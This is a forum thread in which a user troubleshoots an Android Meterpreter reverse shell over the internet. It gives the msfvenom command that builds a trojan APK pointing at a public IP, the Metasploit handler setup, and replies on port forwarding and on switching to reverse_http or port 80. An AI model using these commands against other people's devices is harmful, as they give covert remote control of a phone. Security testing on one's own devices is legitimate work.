Forum Thread: WAN Meterpreter Session Using Msfvenom Not Working?

WAN Meterpreter Session Using Msfvenom Not Working?

Hello,
So I'm trying to create a meterpterter session on my phone over WAN but it's not working. (It works fine on my local network)

I portforwarded the port 4444 to my local (linux machine) ip 192.168.1.123
Here are my portforward settings

Image via postimg.org

I create the payload using msfvenom

msfvenom -p android/meterpreter/reversetcp LHOST={MY PUBLIC IP ADRESS} LPORT=4444 R >/root/FILENAME.apk

and then install it on my phone

I start the meterpreter listener

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reversetcp
set LHOST 192.168.1.123 //local ip
set LPORT 4444
exploit

An then run the app on my phone but it's not working

Help would be appreciated.

16 Responses

check canyouseeme to make sure your ports are being forwarded,
and your ISP is not blocking any incoming connections

Yeah, my port isn't forwarded properly...
My router settings seem good i can't see what the issue could be.
Thoughts?

Do an nmap scan. I don't know if these port checking sites are reliable or not.

I ran this command against an external ip, in this case google.

sudo nmap -n -PN -sA 216.58.209.196

and it returned this

Starting Nmap 7.01 ( https://nmap.org ) at 2016-04-11 11:25 UTC
Nmap scan report for 216.58.209.196
Host is up (0.031s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp unfiltered http
443/tcp unfiltered https

I'm not sure if the command is correct, but the port obviously isn't listed

Use reversehttp

Did you put an Underline "" between "reverse" and "tcp"?
Like this >> "set payload android/meterpreter/reverse
tcp"

Ok ignore that...

Or you can use the port 80 with this payload like a reverse http_

Nope, not working.
I did everything again but only set my port 80.
It's just stuck at
Starting the payload handler...

Not exactly sure if this is your issue but try this. Remove the port forward for the android phone in the router settings. The only one needed is your Linux machine.

What do you mean?
I only named it android, and it's the only one.
Plus it's pointing to my linux machine already (192.168.1.123)

EDIT: NVM on this. I think i just confirmed on my own that this isn't true. I set my lhost as my local IP and ran my WAN trojan and it connected. Not sure where I learned that it needed to be set as a WAN IP for the listener.

This might be your issue. Someone who knows more than me might be able to confirm but from my understanding, you need to set your lhost as your WAN IP or 0.0.0.0 for your listener. Not your local IP.

Oh, sorry my bad. I missread that pic. It looked to me like you had 2 entries, one for android and the other for Kali with both the same port forwarded. I only briefly looked at it.

I had recently had a connection issue and I found out that it was because I accidentally had both computers port forwarding on the same port, which is why I thought this was your issue. NVM. Hope you get it figured out.

i've same problem....any solution??

Share Your Thoughts

  • Hot
  • Active